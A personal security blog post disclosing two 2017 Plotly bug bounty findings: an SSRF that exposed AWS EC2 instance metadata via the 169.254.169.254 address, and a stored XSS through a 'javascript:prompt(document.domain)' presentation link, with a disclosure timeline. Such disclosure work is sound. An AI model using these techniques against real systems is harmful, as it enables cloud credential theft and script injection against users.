Yasin Soliman

Yasin Soliman


I'm Yasin, a security analyst and OSCP from the UK, interested in web application testing and red team operations. This is my personal blog for sharing research findings.

Yasin Soliman
Author

Share


Twitter


A pair of Plotly bugs: Stored XSS and AWS Metadata SSRF

Yasin SolimanYasin Soliman

Plotly is a powerful data analytics and visualisation platform. Founded in 2012, the firm offer a range of products, including a collaborative web interface, API libraries, the Plotly.js library, on-premises services and various software utlities.

New Plotly logo

Plotly maintain a public bug bounty policy in parallel with a dedicated HackerOne program.  I reached out to the team and started searching for bugs in early May. Let's take a look at two interesting reports, starting with the SSRF.

AWS EC2 Metadata Disclosure via SSRF

Brett Buerhaus' blogpost discussing a SSRF vulnerability on the ESEA eSports platform caught my attention in April last year. After proceeding to exploit a URL filter bypass for reflected XSS, Brett learned of an interesting SSRF technique from @NahamSec: EC2 instance metadata disclosure.

Live instances on Amazon's Elastic Compute Cloud can retrieve information by querying the link-local metadata address (169.254.169.254). As a starting point, the below URL discloses endpoints available for inspection:

http://169.254.169.254/latest/meta-data/

The EC2 documentation for this topic contains a highly useful Metadata Categories table along with details on formatting and data types. Interestingly, I discovered that the metadata address can disclose AWS API credentials if the instance is connected to a specific IAM role:

If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...]

Whilst it was not possible to obtain API credentials in this case, the Plotly bug could be reproduced by an authenticated user by visiting a URL such as the following:

The external endpoint processes a valid url parameter and opens the Graph Maker with the retrieved data. As http://169.254.169.254 URLs were accepted, the well-formatted metadata appeared in the Graph Maker:

Redacted image of Graph Maker with values obscured

I came across Plotly Presentations during my wider reconnaissance of the firm's properties and started to explore the Spectacle Editor tool.

Co-authored by Formidable Labs, Spectacle Editor is:

an Electron based app for creating, editing, saving, and publishing Spectacle presentations [...] a joint effort between Formidable and Plotly.

Links can be added to text elements in a Spectacle presentation and were accepted by the platform. After pasting javascript:prompt(document.domain) into the Link field and uploading to Plotly, I selected the test hyperlink:

Stored XSS on Plotly web platform

Straightforward stored XSS via a trusted URL element. After submitting the initial HackerOne report, I later exported and attached the Spectacle JSON file to assist the Plotly team with their investigation and fix.

Conclusion

I would like to commend Jody from Engineering for the swift handling of reports submitted to the Plotly program – and to the Development team for the quick resolution response.

For interested researchers, I'd like to mention that Plotly also pay on Triage for valid reports (a highly encouraged move from program operators).

Research timeline

The following timestamps are provided in GMT. Once the Plotly program becomes public, the applicable HackerOne reports will be disclosed.

SSRF via External URL Import leading to AWS Metadata Disclosure

  • 2017-05-09 09:19 – issue reported
  • 2017-05-10 17:41 – triaged & bounty issued
  • 2017-05-17 22:25 – issue resolved

Stored XSS via Presentation Text Link

  • 2017-05-02 16:49 – issue reported
  • 2017-05-03 19:33 – triaged & bounty issued
  • 2017-05-25 21:30 – issue resolved
Yasin Soliman
Author

Yasin Soliman

Comments